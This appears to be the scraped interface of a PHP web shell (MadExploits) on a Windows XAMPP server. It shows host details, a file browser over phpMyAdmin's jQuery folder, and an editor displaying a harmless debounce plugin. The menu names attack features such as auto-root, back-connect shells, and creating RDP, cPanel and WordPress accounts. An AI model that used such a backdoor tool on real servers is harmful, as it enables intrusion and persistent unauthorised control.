Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
js /
vendor /
jquery /
[ HOME SHELL ]
Name
Size
Permission
Action
MIT-LICENSE.txt
1.07
KB
-rw-rw-rw-
additional-methods.js
50.81
KB
-rw-rw-rw-
jquery-migrate.js
18.64
KB
-rw-rw-rw-
jquery-ui-timepicker-addon.js
76.64
KB
-rw-rw-rw-
jquery-ui.min.js
247.74
KB
-rw-rw-rw-
jquery.ba-hashchange-1.3.js
16.13
KB
-rw-rw-rw-
jquery.debounce-1.0.5.js
1.14
KB
-rw-rw-rw-
jquery.event.drag-2.2.js
12.53
KB
-rw-rw-rw-
jquery.fullscreen.js
5.52
KB
-rw-rw-rw-
jquery.md5.js
9.35
KB
-rw-rw-rw-
jquery.min.js
86.08
KB
-rw-rw-rw-
jquery.min.map
133.2
KB
-rw-rw-rw-
jquery.mousewheel.js
8.07
KB
-rw-rw-rw-
jquery.sortableTable.js
8.01
KB
-rw-rw-rw-
jquery.svg.js
55.32
KB
-rw-rw-rw-
jquery.tablesorter.js
39.16
KB
-rw-rw-rw-
jquery.uitablefilter.js
3.4
KB
-rw-rw-rw-
jquery.validate.js
49.5
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.debounce-1.0.5.js
/** * Debounce and throttle function's decorator plugin 1.0.5 * * Copyright (c) 2009 Filatov Dmitry (alpha@zforms.ru) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ (function($) { $.extend({ debounce : function(fn, timeout, invokeAsap, ctx) { if(arguments.length == 3 && typeof invokeAsap != 'boolean') { ctx = invokeAsap; invokeAsap = false; } var timer; return function() { var args = arguments; ctx = ctx || this; invokeAsap && !timer && fn.apply(ctx, args); clearTimeout(timer); timer = setTimeout(function() { !invokeAsap && fn.apply(ctx, args); timer = null; }, timeout); }; }, throttle : function(fn, timeout, ctx) { var timer, args, needInvoke; return function() { args = arguments; needInvoke = true; ctx = ctx || this; if(!timer) { (function() { if(needInvoke) { fn.apply(ctx, args); needInvoke = false; timer = setTimeout(arguments.callee, timeout); } else { timer = null; } })(); } }; } }); })(jQuery);
Close